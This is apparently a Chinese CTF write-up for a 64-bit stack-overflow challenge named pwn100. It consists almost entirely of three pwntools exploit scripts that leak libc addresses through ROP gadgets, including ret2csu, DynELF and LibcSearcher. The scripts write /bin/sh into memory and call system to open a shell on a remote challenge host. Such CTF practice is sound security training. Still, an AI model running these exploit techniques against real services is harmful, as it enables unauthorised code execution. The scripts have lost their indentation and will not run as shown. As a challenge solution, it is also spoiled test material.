image.png
拖进ida,发现栈溢出,没有system没有binsh
image.png
image.png
image.png
image.png
自己的脚本有问题,只能打印出read函数的地址,然后就有错误了:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import LibcSearcher
p = remote('111.198.29.45',44294)
elf = ELF('./pwn100')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
pop_rbx_rbp_r12_r13_r14_r15 = 0x40075A
mov_rdx_r13_rsi_r14_edi_r15d= 0x400740
pop_rdi = 0x400763
start_addr = 0x400550
binsh_addr = 0x600e10
puts_plt = elf.plt['puts']
read_got = elf.got['read']
puts_got = elf.got['puts']
def stageone():
payload = "a" * 0x48 + p64(pop_rdi) + p64(read_got) + p64(puts_plt) + p64(start_addr)
payload = payload.ljust(200, "a")
p.send(payload)
sleep(1)
p.send("/bin/sh")
print p.recvuntil("bye~")
return u64(p.recv()[1:-1].ljust(8,'\0'))
read_addr = stageone()
print "read address: ", hex(read_addr)
libc_base = read_addr - libc.symbols["read"]
sys_addr = libc_base + libc.symbols["system"]
payload = "a" * 0x48 + p64(pop_rbx_rbp_r12_r13_r14_r15) + p64(0) + p64(1) + p64(read_got) + p64(8) + p64(binsh_addr) + p64(1)
payload += p64(mov_rdx_r13_rsi_r14_edi_r15d)
payload += "\x00" * 56
payload += p64(start_addr)
payload = payload.ljust(200, "a")
p.send(payload)
p.recvuntil("bye~\n")
p.send("/bin/sh\x00")
payload = "a" * 0x48 + p64(pop_rdi) + p64(binsh_addr) + p64(sys_addr) + p64(start_addr)
payload = payload.ljust(200, "a")
p.send(payload)
p.interactive()
DynELF:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
p = remote('111.198.29.45',50442)
elf = ELF('./pwn100')
pop_rbx_rbp_r12_r13_r14_r15 = 0x40075A
mov_rdx_r13_rsi_r14_edi_r15d= 0x400740
pop_rdi = 0x400763
start_addr = 0x400550
binsh_addr = 0x600e10
puts_plt = elf.plt['puts']
read_got = elf.got['read']
def leak(addr):
payload = "a" * 0x48 + p64(pop_rdi) + p64(addr) + p64(puts_plt) + p64(start_addr)
payload = payload.ljust(200, "a")
p.send(payload)
p.recvuntil("bye~\n")
up = ""
content = ""
count = 0
while True:
c = p.recv(numb=1, timeout=0.5)
count += 1
if up == '\n' and c == "":
content = content[:-1] + '\x00'
break
else:
content += c
up = c
content = content[:4]
log.info("%#x => %s" % (addr, (content or '').encode('hex')))
return content
d = DynELF(leak, elf = elf)
sys_addr = d.lookup('system', 'libc')
log.info("system_addr => %#x", sys_addr)
payload = "a" * 0x48 + p64(pop_rbx_rbp_r12_r13_r14_r15) + p64(0) + p64(1) + p64(read_got) + p64(8) + p64(binsh_addr) + p64(1)
payload += p64(mov_rdx_r13_rsi_r14_edi_r15d)
payload += "\x00" * 56 #rop2结束又跳转到rop1,需要再填充7 * 8字节到返回地址
payload += p64(start_addr)
payload = payload.ljust(200, "a")
p.send(payload)
p.recvuntil("bye~\n")
p.send("/bin/sh\x00")
payload = "a" * 0x48 + p64(pop_rdi) + p64(binsh_addr) + p64(sys_addr)
payload = payload.ljust(200, "a")
p.send(payload)
p.interactive()
普通方法:
#coding:utf-8
from pwn import *
from LibcSearcher import *
io = remote('111.198.29.45',44294)
readn = 0x40063D
start = 0x40068E
read_got = 0x601028
put_plt = 0x400500
put_got = 0x601018
length = 0x40
max_length = 200
bss = 0x601040
pop_rdi = 0x0000000000400763
pop_rsi_r15 = 0x0000000000400761
def stageone():
payload = 'A'*length+"AAAAAAAA"+p64(pop_rdi)+p64(read_got)+p64(put_plt)+p64(pop_rdi)+p64(bss)+p64(pop_rsi_r15)+p64(7)+p64(0)+p64(readn)+p64(start)
payload += "A"*(max_length-len(payload))
io.send(payload)
sleep(1)
io.send("/bin/sh")
print io.recvuntil("bye~")
return u64(io.recv()[1:-1].ljust(8,'\0'))
read_addr = stageone()
print "read address: ", hex(read_addr)
libc = LibcSearcher("read",read_addr)
libc_base = read_addr - libc.dump("read")
system_addr = libc_base + libc.dump("system")
print "system address: ",hex(system_addr)
def stagetwo():
payload = 'A'*length+"AAAAAAAA"+p64(pop_rdi)+p64(bss) +p64(system_addr)+p64(start)
payload += "A"*(max_length-len(payload))
io.send(payload)
stagetwo()
io.interactive()